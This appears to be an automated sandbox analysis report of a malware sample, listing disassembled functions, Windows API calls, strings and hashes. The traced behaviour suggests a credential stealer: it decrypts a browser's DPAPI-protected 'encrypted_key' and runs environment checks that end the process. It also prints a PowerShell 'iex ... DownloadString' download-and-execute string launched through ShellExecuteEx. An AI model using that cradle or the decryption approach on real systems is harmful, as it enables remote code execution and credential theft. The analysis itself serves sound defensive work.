                                              • Opcode Fuzzy Hash: 3fc5a8dedeb49d1d19b08a8b2b74cc72c2b475cc3767d007be69e7bc9d832ffb
                                              • Instruction Fuzzy Hash: C571D874A04109DFDB04CF48C494BAAB7B1FF88305F158179E84AAF395C739AA91CF95
                                              APIs
                                              • lstrcat.KERNEL32(?,006D6D0C), ref: 04854C92
                                                • Part of subcall function 048591D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 04859202
                                              • lstrcat.KERNEL32(?,00000000), ref: 04854CB8
                                              • lstrcat.KERNEL32(?,?), ref: 04854CD7
                                              • lstrcat.KERNEL32(?,?), ref: 04854CEB
                                              • lstrcat.KERNEL32(?,006D6C84), ref: 04854CFE
                                              • lstrcat.KERNEL32(?,?), ref: 04854D12
                                              • lstrcat.KERNEL32(?,006D6CC8), ref: 04854D26
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                                • Part of subcall function 04859187: GetFileAttributesA.KERNEL32(00000000,?,04841DFB,?,?,00425784,?,?,00420E22), ref: 04859196
                                                • Part of subcall function 04854A27: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 04854A37
                                                • Part of subcall function 04854A27: RtlAllocateHeap.NTDLL(00000000), ref: 04854A3E
                                                • Part of subcall function 04854A27: wsprintfA.USER32 ref: 04854A5D
                                                • Part of subcall function 04854A27: FindFirstFileA.KERNEL32(?,?), ref: 04854A74
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                              • String ID:
                                              • API String ID: 2540262943-0
                                              • Opcode ID: 91df7f0c7e554cb1d3044ee6f87cd087b154477ead0d8d2d1c74f8365ca17e83
                                              • Instruction ID: 11081cceb469f73771ac1521b038de1d50706ae2d3b54dc5d0be7c33f4b5bfb8
                                              • Opcode Fuzzy Hash: 91df7f0c7e554cb1d3044ee6f87cd087b154477ead0d8d2d1c74f8365ca17e83
                                              • Instruction Fuzzy Hash: BE3157B6D0021867DB14F7B4DC84EE9737D6B58704F444B8AB645E6060EAB4A7C8CF91
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • ShellExecuteEx.SHELL32(0000003C), ref: 00412FD5
                                              Strings
                                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412F14
                                              • ')", xrefs: 00412F03
                                              • <, xrefs: 00412F89
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412F54
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              • API String ID: 3031569214-898575020
                                              • Opcode ID: ceff6c1b0c5b41120544c3d3be6942fd96f27d98ecc1bbdb5468e056c7fe4573
                                              • Instruction ID: fa4238ec13a9909d2a06eabaeedbec9afd3c4d5d27ba3f2f176ac5e057c61c04
                                              • Opcode Fuzzy Hash: ceff6c1b0c5b41120544c3d3be6942fd96f27d98ecc1bbdb5468e056c7fe4573
                                              • Instruction Fuzzy Hash: DB415E70E011089ADB04EFA1D866BEDBB79AF10314F40445EF10277196EF782AD9CF99
                                              APIs
                                                • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                              • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 004151CA
                                              • lstrcatA.KERNEL32(?,00421058), ref: 004151E7
                                              • lstrcatA.KERNEL32(?,02C9EC50), ref: 004151FB
                                              • lstrcatA.KERNEL32(?,0042105C), ref: 0041520D
                                                • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
                                                • Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                                • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
                                                • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
                                                • Part of subcall function 00414B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
                                                • Part of subcall function 00414B60: FindClose.KERNEL32(000000FF), ref: 00414DE2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Similarity
                                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                              • String ID: cA
                                              • API String ID: 2667927680-2872761854
                                              APIs
                                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 048414A5
                                              • __aulldiv.LIBCMT ref: 048414BF
                                              • __aulldiv.LIBCMT ref: 048414CD
                                              • ExitProcess.KERNEL32 ref: 048414FB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Similarity
                                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                              • String ID: @
                                              • API String ID: 3404098578-2766056989
                                              APIs
                                              • memcmp.MSVCRT(?,0042124C,00000003), ref: 0484A7E4
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                              • memcmp.MSVCRT(?,004210FC,00000003), ref: 0484A839
                                              • memset.MSVCRT ref: 0484A872
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 0484A8CB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Similarity
                                              • API ID: memcmp$AllocLocallstrcpymemset
                                              • String ID: @
                                              • API String ID: 631489823-2766056989
                                              APIs
                                              • strtok_s.MSVCRT ref: 00410FE8
                                              • strtok_s.MSVCRT ref: 0041112D
                                                • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,02C9D528,?,004210F4,?,00000000), ref: 0041AB3B
                                                • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Similarity
                                              • API ID: strtok_s$lstrcpylstrlen
                                              • String ID:
                                              • API String ID: 348468850-0
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                                • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                                • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                                • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                                • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                                • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                                • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0040A489
                                                • Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
                                                • Part of subcall function 0040A210: LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
                                                • Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
                                                • Part of subcall function 0040A210: LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F
                                              • memcmp.MSVCRT(?,DPAPI,00000005), ref: 0040A4E2
                                                • Part of subcall function 0040A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A2D4
                                                • Part of subcall function 0040A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A2F3
                                                • Part of subcall function 0040A2B0: memcpy.MSVCRT(?,?,?), ref: 0040A316
                                                • Part of subcall function 0040A2B0: LocalFree.KERNEL32(?), ref: 0040A323
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Similarity
                                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                              • String ID: $"encrypted_key":"$DPAPI
                                              • API String ID: 3731072634-738592651
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Similarity
                                              • API ID: CodeInfoPageValidmemset
                                              • String ID:
                                              • API String ID: 703783727-0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Similarity
                                              • API ID: dllmain_raw$dllmain_crt_dispatch
                                              • String ID:
                                              • API String ID: 3136044242-0
                                              APIs
                                              • GetSystemTime.KERNEL32(004210F4,?,?,00416DB1,00000000,?,02C9D528,?,004210F4,?,00000000,?), ref: 00416C0C
                                              • sscanf.NTDLL ref: 00416C39
                                              • SystemTimeToFileTime.KERNEL32(004210F4,00000000,?,?,?,?,?,?,?,?,?,?,?,02C9D528,?,004210F4), ref: 00416C52
                                              • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,02C9D528,?,004210F4), ref: 00416C60
                                              • ExitProcess.KERNEL32 ref: 00416C7A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Similarity
                                              • API ID: Time$System$File$ExitProcesssscanf
                                              • String ID:
                                              • API String ID: 2533653975-0
                                              APIs
                                              • GetSystemTime.KERNEL32(?), ref: 04856E73
                                              • sscanf.NTDLL ref: 04856EA0
                                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 04856EB9
                                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 04856EC7
                                              • ExitProcess.KERNEL32 ref: 04856EE1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Similarity
                                              • API ID: Time$System$File$ExitProcesssscanf
                                              • String ID:
                                              • API String ID: 2533653975-0
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417FC7
                                              • HeapAlloc.KERNEL32(00000000), ref: 00417FCE
                                              • RegOpenKeyExA.ADVAPI32(80000002,02CA13D8,00000000,00020119,?), ref: 00417FEE
                                              • RegQueryValueExA.ADVAPI32(?,02CA5EF0,00000000,00000000,000000FF,000000FF), ref: 0041800F
                                              • RegCloseKey.ADVAPI32(?), ref: 00418022
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Similarity
                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                              • String ID:
                                              • API String ID: 3466090806-0
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0485822E
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 04858235
                                              • RegOpenKeyExA.ADVAPI32(80000002,006D6BD4,00000000,00020119,?), ref: 04858255
                                              • RegQueryValueExA.ADVAPI32(?,006D6EEC,00000000,00000000,000000FF,000000FF), ref: 04858276
                                              • RegCloseKey.ADVAPI32(?), ref: 04858289
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Similarity
                                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                              • String ID:
                                              • API String ID: 3225020163-0
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 04857B2B
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 04857B32
                                              • RegOpenKeyExA.ADVAPI32(80000002,006D6D98,00000000,00020119,04857AB0), ref: 04857B52
                                              • RegQueryValueExA.ADVAPI32(04857AB0,00420AB4,00000000,00000000,?,000000FF), ref: 04857B71
                                              • RegCloseKey.ADVAPI32(04857AB0), ref: 04857B7B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Similarity
                                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                              • String ID:
                                              • API String ID: 3225020163-0
                                              APIs
                                              • StrStrA.SHLWAPI(02CA54D8,00000000,00000000,?,00409F71,00000000,02CA54D8,00000000), ref: 004193FC
                                              • lstrcpyn.KERNEL32(006D7580,02CA54D8,02CA54D8,?,00409F71,00000000,02CA54D8), ref: 00419420
                                              • lstrlenA.KERNEL32(00000000,?,00409F71,00000000,02CA54D8), ref: 00419437
                                              • wsprintfA.USER32 ref: 00419457
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Similarity
                                              • API ID: lstrcpynlstrlenwsprintf
                                              • String ID: %s%s
                                              • API String ID: 1206339513-3252725368
                                              APIs
                                              • StrStrA.SHLWAPI(\nm,00000000,00000000,?,0484A1D8,00000000,006D6E5C,00000000), ref: 04859663
                                              • lstrcpyn.KERNEL32(006D7580,\nm,\nm,?,0484A1D8,00000000,006D6E5C), ref: 04859687
                                              • lstrlen.KERNEL32(00000000,?,0484A1D8,00000000,006D6E5C), ref: 0485969E
                                              • wsprintfA.USER32 ref: 048596BE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Similarity
                                              • API ID: lstrcpynlstrlenwsprintf
                                              • String ID: \nm
                                              • API String ID: 1206339513-1385846026
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                              • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                              • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                              • String ID:
                                              • API String ID: 3466090806-0
                                              • Opcode ID: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
                                              • Instruction ID: b0bfc99e0bb5f41d030d85d97ebb5ad9faa7414484ca5a523084a8432581bb26
                                              • Opcode Fuzzy Hash: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
                                              • Instruction Fuzzy Hash: D1013179E45209BFDB00DFD0DC49FAE7779EB48701F00419AFA05A7280E770AA008B91
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0484151B
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 04841522
                                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 0484153E
                                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 0484155C
                                              • RegCloseKey.ADVAPI32(?), ref: 04841566
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                              • String ID:
                                              • API String ID: 3225020163-0
                                              • Opcode ID: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
                                              • Instruction ID: c9af1141d1960b0577fc1c8b54163734c41ebdc85579db2104b75967111d429c
                                              • Opcode Fuzzy Hash: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
                                              • Instruction Fuzzy Hash: 7F01E179E45209BFDB04DFD4DC49FAE7779EB48701F104599FA0597280E770AA408B91
                                              APIs
                                              • __getptd.LIBCMT ref: 0041CA7E
                                                • Part of subcall function 0041C2A0: __getptd_noexit.LIBCMT ref: 0041C2A3
                                                • Part of subcall function 0041C2A0: __amsg_exit.LIBCMT ref: 0041C2B0
                                              • __getptd.LIBCMT ref: 0041CA95
                                              • __amsg_exit.LIBCMT ref: 0041CAA3
                                              • __lock.LIBCMT ref: 0041CAB3
                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 0041CAC7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                              • String ID:
                                              • API String ID: 938513278-0
                                              • Opcode ID: 8e15bae909d06919cb4135276c74b5d3530aaf41c11ecb0caa68e2a981b89e64
                                              • Instruction ID: c5a7914bfd81a4edf64c409ce704b1973edb92a02c079c255f399551119664c9
                                              • Opcode Fuzzy Hash: 8e15bae909d06919cb4135276c74b5d3530aaf41c11ecb0caa68e2a981b89e64
                                              • Instruction Fuzzy Hash: D0F06231A803189BD622FBA95C867DE33A0AF40758F50014FE405562D2CB7C59C186DE
                                              APIs
                                              • __getptd.LIBCMT ref: 0485CCE5
                                                • Part of subcall function 0485C507: __getptd_noexit.LIBCMT ref: 0485C50A
                                                • Part of subcall function 0485C507: __amsg_exit.LIBCMT ref: 0485C517
                                              • __getptd.LIBCMT ref: 0485CCFC
                                              • __amsg_exit.LIBCMT ref: 0485CD0A
                                              • __lock.LIBCMT ref: 0485CD1A
                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 0485CD2E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                              • String ID:
                                              • API String ID: 938513278-0
                                              • Opcode ID: 2c0ddcac0e8e8bcdfdf9741ae957a452135e3d1b714c0b19c8a1c6a09a33287e
                                              • Instruction ID: a8870cd423b2bdebac2405c4781deff9d41b4be8c630f17b409d6c798e0214d2
                                              • Opcode Fuzzy Hash: 2c0ddcac0e8e8bcdfdf9741ae957a452135e3d1b714c0b19c8a1c6a09a33287e
                                              • Instruction Fuzzy Hash: 7AF01231A017109AEA25FBBC9845B5D77A06F007A9F110B19DC04EA1F0DAA47541EE9B
                                              APIs
                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416903
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • ShellExecuteEx.SHELL32(0000003C), ref: 004169C6
                                              • ExitProcess.KERNEL32 ref: 004169F5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                              • String ID: <
                                              • API String ID: 1148417306-4251816714
                                              • Opcode ID: 80adf956ea99f7686bf73ed2305a0c7c355c3d8c509fc3f8e2274e2124ba97dc
                                              • Instruction ID: 69e214fcc2f82cbe4d830bf51364f862e1744f727ac50a07542482e63681b1c7
                                              • Opcode Fuzzy Hash: 80adf956ea99f7686bf73ed2305a0c7c355c3d8c509fc3f8e2274e2124ba97dc
                                              • Instruction Fuzzy Hash: 82313AB1902218ABDB14EB91DC92FDEB779AF08314F40418EF20566191DF787B88CF69
                                              APIs
                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 04856B6A
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
